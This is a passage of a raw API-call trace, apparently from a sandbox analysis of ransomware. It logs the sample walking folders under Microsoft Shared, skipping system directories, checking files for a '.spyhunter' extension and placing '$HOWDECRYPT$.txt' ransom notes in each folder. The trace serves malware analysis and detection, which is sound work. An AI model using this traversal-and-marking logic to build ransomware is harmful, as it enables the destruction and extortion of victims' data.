(lpString="Windows") returned 7 [0089.356] lstrcmpiW (lpString1="LISTS", lpString2="$Recycle.bin") returned 1 [0089.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.356] lstrcmpiW (lpString1="LISTS", lpString2="System Volume Information") returned -1 [0089.356] lstrlenW (lpString="System Volume Information") returned 25 [0089.357] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned 66 [0089.357] lstrcmpW (lpString1="LISTS", lpString2=".") returned 1 [0089.357] lstrcmpW (lpString1="LISTS", lpString2="..") returned 1 [0089.357] GetProcessHeap () returned 0x2c0000 [0089.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.357] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*") returned 68 [0089.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.446] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.446] lstrlenW (lpString="Windows") returned 7 [0089.446] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.446] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.446] lstrlenW (lpString="System Volume Information") returned 25 [0089.446] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\.") returned 68 [0089.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.446] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.446] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.446] lstrlenW (lpString="Windows") returned 7 [0089.446] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.446] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.446] lstrlenW (lpString="System Volume Information") returned 25 [0089.446] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\..") returned 69 [0089.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.447] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.447] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0089.447] lstrlenW (lpString="Windows") returned 7 [0089.447] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0089.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.447] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0089.447] lstrlenW (lpString="System Volume Information") returned 25 [0089.447] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned 71 [0089.447] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0089.447] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0089.447] GetProcessHeap () returned 0x2c0000 [0089.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.447] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*") returned 73 [0089.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0089.447] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.448] lstrlenW (lpString="Windows") returned 7 [0089.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.448] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.448] lstrlenW (lpString="System Volume Information") returned 25 [0089.448] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\.") returned 73 [0089.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.448] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.449] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.449] lstrlenW (lpString="Windows") returned 7 [0089.449] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.449] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.449] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.449] lstrlenW (lpString="System Volume Information") returned 25 [0089.449] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\..") returned 74 [0089.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.449] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.449] lstrcmpiW (lpString1="DATES.XML", lpString2="Windows") returned -1 [0089.449] lstrlenW (lpString="Windows") returned 7 [0089.449] lstrcmpiW (lpString1="DATES.XML", lpString2="$Recycle.bin") returned 1 [0089.449] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.449] lstrcmpiW (lpString1="DATES.XML", lpString2="System Volume Information") returned -1 [0089.449] lstrlenW (lpString="System Volume Information") returned 25 [0089.449] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0089.449] StrStrIW (lpFirst="DATES.XML", lpSrch=".spyhunter") returned 0x0 [0089.449] lstrcmpW (lpString1="DATES.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.449] lstrcmpW (lpString1="DATES.XML", lpString2="_uninstalling_.png") returned 1 [0089.449] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0089.449] GetProcessHeap () returned 0x2c0000 [0089.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x329458 [0089.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd20) returned 0x3824f8 [0089.450] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.450] lstrcmpiW (lpString1="PHONE.XML", lpString2="Windows") returned -1 [0089.450] lstrlenW (lpString="Windows") returned 7 [0089.450] lstrcmpiW (lpString1="PHONE.XML", lpString2="$Recycle.bin") returned 1 [0089.450] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.450] lstrcmpiW (lpString1="PHONE.XML", lpString2="System Volume Information") returned -1 [0089.450] lstrlenW (lpString="System Volume Information") returned 25 [0089.450] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0089.450] StrStrIW (lpFirst="PHONE.XML", lpSrch=".spyhunter") returned 0x0 [0089.450] lstrcmpW (lpString1="PHONE.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.450] lstrcmpW (lpString1="PHONE.XML", lpString2="_uninstalling_.png") returned 1 [0089.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0089.450] GetProcessHeap () returned 0x2c0000 [0089.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x329368 [0089.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd28) returned 0x3824f8 [0089.450] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.450] lstrcmpiW (lpString1="STOCKS.DAT", lpString2="Windows") returned -1 [0089.450] lstrlenW (lpString="Windows") returned 7 [0089.450] lstrcmpiW (lpString1="STOCKS.DAT", lpString2="$Recycle.bin") returned 1 [0089.450] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.450] lstrcmpiW (lpString1="STOCKS.DAT", lpString2="System Volume Information") returned -1 [0089.450] lstrlenW (lpString="System Volume Information") returned 25 [0089.451] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0089.451] StrStrIW (lpFirst="STOCKS.DAT", lpSrch=".spyhunter") returned 0x0 [0089.451] lstrcmpW (lpString1="STOCKS.DAT", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.451] lstrcmpW (lpString1="STOCKS.DAT", lpString2="_uninstalling_.png") returned 1 [0089.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0089.451] GetProcessHeap () returned 0x2c0000 [0089.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x329548 [0089.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd30) returned 0x3824f8 [0089.451] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.451] lstrcmpiW (lpString1="STOCKS.XML", lpString2="Windows") returned -1 [0089.451] lstrlenW (lpString="Windows") returned 7 [0089.451] lstrcmpiW (lpString1="STOCKS.XML", lpString2="$Recycle.bin") returned 1 [0089.451] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.451] lstrcmpiW (lpString1="STOCKS.XML", lpString2="System Volume Information") returned -1 [0089.451] lstrlenW (lpString="System Volume Information") returned 25 [0089.451] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0089.451] StrStrIW (lpFirst="STOCKS.XML", lpSrch=".spyhunter") returned 0x0 [0089.451] lstrcmpW (lpString1="STOCKS.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.451] lstrcmpW (lpString1="STOCKS.XML", lpString2="_uninstalling_.png") returned 1 [0089.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0089.451] GetProcessHeap () returned 0x2c0000 [0089.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x329638 [0089.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd38) returned 0x3824f8 [0089.452] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0089.452] lstrcmpiW (lpString1="TIME.XML", lpString2="Windows") returned -1 [0089.452] lstrlenW (lpString="Windows") returned 7 [0089.452] lstrcmpiW (lpString1="TIME.XML", lpString2="$Recycle.bin") returned 1 [0089.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.452] lstrcmpiW (lpString1="TIME.XML", lpString2="System Volume Information") returned 1 [0089.452] lstrlenW (lpString="System Volume Information") returned 25 [0089.452] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0089.452] StrStrIW (lpFirst="TIME.XML", lpSrch=".spyhunter") returned 0x0 [0089.452] lstrcmpW (lpString1="TIME.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.452] lstrcmpW (lpString1="TIME.XML", lpString2="_uninstalling_.png") returned 1 [0089.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0089.452] GetProcessHeap () returned 0x2c0000 [0089.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329728 [0089.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd40) returned 0x3824f8 [0089.452] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0089.452] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0089.452] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\$HOWDECRYPT$.txt") returned 88 [0089.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\$HOWDECRYPT$.txt") returned 88 [0089.452] GetProcessHeap () returned 0x2c0000 [0089.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a060 [0089.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd48) returned 0x3824f8 [0089.453] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.453] lstrcmpiW (lpString1="BASMLA.XSL", lpString2="Windows") returned -1 [0089.453] lstrlenW (lpString="Windows") returned 7 [0089.453] lstrcmpiW (lpString1="BASMLA.XSL", lpString2="$Recycle.bin") returned 1 [0089.453] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.453] lstrcmpiW (lpString1="BASMLA.XSL", lpString2="System Volume Information") returned -1 [0089.454] lstrlenW (lpString="System Volume Information") returned 25 [0089.454] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0089.454] StrStrIW (lpFirst="BASMLA.XSL", lpSrch=".spyhunter") returned 0x0 [0089.454] lstrcmpW (lpString1="BASMLA.XSL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.454] lstrcmpW (lpString1="BASMLA.XSL", lpString2="_uninstalling_.png") returned 1 [0089.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0089.454] GetProcessHeap () returned 0x2c0000 [0089.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372ec8 [0089.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd50) returned 0x3824f8 [0089.454] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.454] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.456] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\$HOWDECRYPT$.txt") returned 83 [0089.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\$HOWDECRYPT$.txt") returned 83 [0089.456] GetProcessHeap () returned 0x2c0000 [0089.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x329818 [0089.456] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd58) returned 0x3824f8 [0089.456] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.456] lstrcmpiW (lpString1="METCONV.DLL", lpString2="Windows") returned -1 [0089.456] lstrlenW (lpString="Windows") returned 7 [0089.456] lstrcmpiW (lpString1="METCONV.DLL", lpString2="$Recycle.bin") returned 1 [0089.456] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.456] lstrcmpiW (lpString1="METCONV.DLL", lpString2="System Volume Information") returned -1 [0089.456] lstrlenW (lpString="System Volume Information") returned 25 [0089.456] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0089.456] StrStrIW (lpFirst="METCONV.DLL", lpSrch=".spyhunter") returned 0x0 [0089.456] lstrcmpW (lpString1="METCONV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.456] lstrcmpW (lpString1="METCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0089.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0089.457] GetProcessHeap () returned 0x2c0000 [0089.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3856e0 [0089.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd60) returned 0x3824f8 [0089.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.457] lstrcmpiW (lpString1="METCONV.TXT", lpString2="Windows") returned -1 [0089.457] lstrlenW (lpString="Windows") returned 7 [0089.457] lstrcmpiW (lpString1="METCONV.TXT", lpString2="$Recycle.bin") returned 1 [0089.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.457] lstrcmpiW (lpString1="METCONV.TXT", lpString2="System Volume Information") returned -1 [0089.457] lstrlenW (lpString="System Volume Information") returned 25 [0089.457] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0089.457] StrStrIW (lpFirst="METCONV.TXT", lpSrch=".spyhunter") returned 0x0 [0089.457] lstrcmpW (lpString1="METCONV.TXT", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.457] lstrcmpW (lpString1="METCONV.TXT", lpString2="_uninstalling_.png") returned 1 [0089.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0089.457] GetProcessHeap () returned 0x2c0000 [0089.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3857c0 [0089.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd68) returned 0x3824f8 [0089.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.457] lstrcmpiW (lpString1="MOFL.DLL", lpString2="Windows") returned -1 [0089.457] lstrlenW (lpString="Windows") returned 7 [0089.457] lstrcmpiW (lpString1="MOFL.DLL", lpString2="$Recycle.bin") returned 1 [0089.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.457] lstrcmpiW (lpString1="MOFL.DLL", lpString2="System Volume Information") returned -1 [0089.457] lstrlenW (lpString="System Volume Information") returned 25 [0089.457] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0089.457] StrStrIW (lpFirst="MOFL.DLL", lpSrch=".spyhunter") returned 0x0 [0089.458] lstrcmpW (lpString1="MOFL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.458] lstrcmpW (lpString1="MOFL.DLL", lpString2="_uninstalling_.png") returned 1 [0089.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0089.458] GetProcessHeap () returned 0x2c0000 [0089.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37d708 [0089.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd70) returned 0x3824f8 [0089.458] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.458] lstrcmpiW (lpString1="MSTAG.TLB", lpString2="Windows") returned -1 [0089.458] lstrlenW (lpString="Windows") returned 7 [0089.458] lstrcmpiW (lpString1="MSTAG.TLB", lpString2="$Recycle.bin") returned 1 [0089.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.458] lstrcmpiW (lpString1="MSTAG.TLB", lpString2="System Volume Information") returned -1 [0089.458] lstrlenW (lpString="System Volume Information") returned 25 [0089.458] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0089.458] StrStrIW (lpFirst="MSTAG.TLB", lpSrch=".spyhunter") returned 0x0 [0089.458] lstrcmpW (lpString1="MSTAG.TLB", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.458] lstrcmpW (lpString1="MSTAG.TLB", lpString2="_uninstalling_.png") returned 1 [0089.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0089.458] GetProcessHeap () returned 0x2c0000 [0089.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37d558 [0089.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd78) returned 0x3824f8 [0089.458] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.458] lstrcmpiW (lpString1="SmartTagInstall.exe", lpString2="Windows") returned -1 [0089.458] lstrlenW (lpString="Windows") returned 7 [0089.458] lstrcmpiW (lpString1="SmartTagInstall.exe", lpString2="$Recycle.bin") returned 1 [0089.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.458] lstrcmpiW (lpString1="SmartTagInstall.exe", lpString2="System Volume Information") returned -1 [0089.458] lstrlenW (lpString="System Volume Information") returned 25 [0089.459] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0089.459] StrStrIW (lpFirst="SmartTagInstall.exe", lpSrch=".spyhunter") returned 0x0 [0089.459] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.459] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="_uninstalling_.png") returned 1 [0089.459] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0089.459] GetProcessHeap () returned 0x2c0000 [0089.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329908 [0089.459] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd80) returned 0x3824f8 [0089.459] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0089.459] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0089.460] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\$HOWDECRYPT$.txt") returned 77 [0089.460] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\$HOWDECRYPT$.txt") returned 77 [0089.460] GetProcessHeap () returned 0x2c0000 [0089.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373180 [0089.460] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd88) returned 0x3824f8 [0089.461] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0089.461] lstrcmpiW (lpString1="Source Engine", lpString2="Windows") returned -1 [0089.461] lstrlenW (lpString="Windows") returned 7 [0089.461] lstrcmpiW (lpString1="Source Engine", lpString2="$Recycle.bin") returned 1 [0089.461] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.461] lstrcmpiW (lpString1="Source Engine", lpString2="System Volume Information") returned -1 [0089.461] lstrlenW (lpString="System Volume Information") returned 25 [0089.461] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned 64 [0089.461] lstrcmpW (lpString1="Source Engine", lpString2=".") returned 1 [0089.461] lstrcmpW (lpString1="Source Engine", lpString2="..") returned 1 [0089.461] GetProcessHeap () returned 0x2c0000 [0089.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0089.462] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*") returned 66 [0089.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0089.468] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.469] lstrlenW (lpString="Windows") returned 7 [0089.469] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.469] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.469] lstrlenW (lpString="System Volume Information") returned 25 [0089.469] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\.") returned 66 [0089.469] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.469] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.469] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.469] lstrlenW (lpString="Windows") returned 7 [0089.469] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.469] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.469] lstrlenW (lpString="System Volume Information") returned 25 [0089.469] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\..") returned 67 [0089.469] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.469] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.469] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.469] lstrcmpiW (lpString1="OSE.EXE", lpString2="Windows") returned -1 [0089.469] lstrlenW (lpString="Windows") returned 7 [0089.469] lstrcmpiW (lpString1="OSE.EXE", lpString2="$Recycle.bin") returned 1 [0089.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.469] lstrcmpiW (lpString1="OSE.EXE", lpString2="System Volume Information") returned -1 [0089.469] lstrlenW (lpString="System Volume Information") returned 25 [0089.469] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0089.469] StrStrIW (lpFirst="OSE.EXE", lpSrch=".spyhunter") returned 0x0 [0089.469] lstrcmpW (lpString1="OSE.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.470] 